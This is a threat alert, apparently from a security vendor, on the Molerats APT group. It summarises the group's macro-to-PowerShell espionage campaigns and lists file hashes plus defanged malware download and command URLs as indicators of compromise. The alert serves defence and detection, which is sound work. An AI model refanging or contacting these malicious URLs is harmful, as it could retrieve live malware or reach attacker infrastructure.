Rewterz Threat Alert – Molerats APT -Active IOCs

Severity

High

Analysis Summary

Molerats APT – also known as Moonlight, Extreme Jackal, and Gaza Hackers Team – have been active since 2012. They made headlines in 2012 when they conducted a cyberattack against Israeli government. The targeted nations expanded to include Palestine, U.S., and also the UK. Molerats is a politically motivated nation-state actor that is conducting cyber espionage using three new malware variants:

1. SharpStage Backdoor
2. DropBook backdoor
3. MoleNet Downloader

Molerats use Dropbox, Google Drive, and other legitimate services to drop spyware for cyber espionage against the Middle-East. 

They use content written in the Arabic language related to the Palestinian conflict with Israel which encloses a macro that can execute a PowerShell command for fetching malware

Impact

• Data Exfiltration
• Cyber Espionage
• Political and Economic Loss

Indicators of Compromise

MD5

• 4c61985a5c8c11eb516e592397343f27
• b0f7e462dde681004f5b2b1eca1f38e0
• 79c25e297870ce68907f2c25564a161f
• 1b1ec8ae327a5543423978e7e58fc44c
• 5f70d52d2be4d0389eeb1c7e27d5e9bd
• a559547c0815d1a4c025d6de25108a70
• 3158e619788d56669175490817863fb1
• eea1c70128060e6246bc959a873be7da
• 60e9b1c155263385f51b80345c292269
• f4d70ad2e247123db47bb6bfcddf6333
• 8f201c59e28bb3fb6c09f5c424972988
• 2ca3f1b013c26f9147547c6d67d02a8c
• ae3d8576594867cfd55bac9fe12d6a54
• af44e1c376503429bef73e668e56ab7a
• 380962723eae3e610e957c075b884dd5

SHA-256

• 553127cb586591cbfbae54dd4e28d4cd40fdddebaf4e0e7e1f3f23c446a621bb
• 58f926d9bd70c144f8697905bf81dfff046a12929639dfba3a6bd30a26367823
• 782681add2e26a17f4ad415b5b30f280c93f954a40ec4f00e0e60f9ef3884ac9
• 688f79ba03554bbaf2be513416360ce44757b2f69103e6043ab66508611fe01a
• 69af17199ede144d1c743146d4a7b7709b765e57375d4a4200ea742dabef75ef
• caab3635c747d037eff7d8597698636c9a597ff631840e551011011bd4608245
• 2578cbf4980569b372e06cf414c3da9e29226df4612e2fc6c56793f77f8429d8
• 54eadcd0b93f0708c8621d2d8d1fb4016f617680b3b0496343a9b3fed429aaf9
• 6afa011e2da6b009ab8e10a59c55c0f0c2161ca19f6305002f95dd532cf594bf
• 5b0693731f100b960720d67bda6f3e6df1c25b7d5024d11cf61c13e7492f18cf
• 5b186548de81bc1d1ce92c042a6c488a647d80e570dd58c8d3f34910c12aba87
• f5894e8c68aa2d3e34f7c967e6c4ad3cf35b399d452826148c2dd99958fa2af4
• 4e2bede5a455218844d18ff7086d9d35714499afb4d8d2c609274e1a05c67339
• 49eb73f776e4e6d87d9701a135769c843847e7af6f5372fa99aba97b8c6af639
• f323a150d7597f46d29eb3a3c56f74e11d18caf164f9176c8c1b2fa0031cc729

SHA-1

• 0a2b7ac50f1467588b0e0b1b73fdfd270eaf86a0
• 7f0e609cd49a51b1e0fcc08499a618136451f689
• 0eb6fd1bbc58fff0d85fe01e6528939650f8965c
• d59fccb2cfb79cf26b332e40b102aa35d67b44ff
• 7f3d04f54ffff9751d037398752107856f563e73
• 8ec4d30a3040e260174cabb4b0c3959233b53929
• 2da78a9a8b3005fcf64028b035ab6f1a26ac290c
• c3be6ad66b8de00741901ea9556621ef3515ee85
• 810ad432a3cec7b6ffca3268685d21f11b1b1688
• 11c38b5c1bef14939410ebddcfec9c8a5e0e6aae
• 549d6a3123ea553d2bec5ef01029cd48fc50e0db
• dde1e4ed199cca865a43f400646157cf3f42dd05
• 52693b5624d8ec23a5884653eecdf44502292109
• 8b74574582a0adceb8b218399877c3f57daae57f
• d30810bdd1fe0e771c810659cabdb024985c4e7f

URL

• https[:]//doc-0s-acdocs[.]googleusercontent[.]com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9bqijre42671eatme7gki86fteputh
• 9h/1607592975000/05594231565667585421/*/1NnMlUPwkxK4_wAJwrqxqBAfdKCPDxyeh?e=download
• https[:]//www[.]artlifelondon[.]com/beta/medias[.]php
• http[:]//artlifelondon[.]com/hamas_internal_elections[.]rar
• https[:]//yourbusiness[.]azcentral[.]com/plan-seminar-workshop-14583[.]html
• https[:]//www[.]forextradingtipsblog[.]com/beta/mediasG[.]php?NamePC=&NameUser=&Mask=0
• https[:]//forextradingtipsblog[.]com/SaudiRecognitionofIsrael[.]php
• https[:]//app[.]simplenote[.]com/p/04T5bp
• https[:]//exchangeupdates[.]com/enterprise/Wenterprise[.]php

Remediation

• Block the threat indicators at their respective controls.
• Search for IOCs in your environment.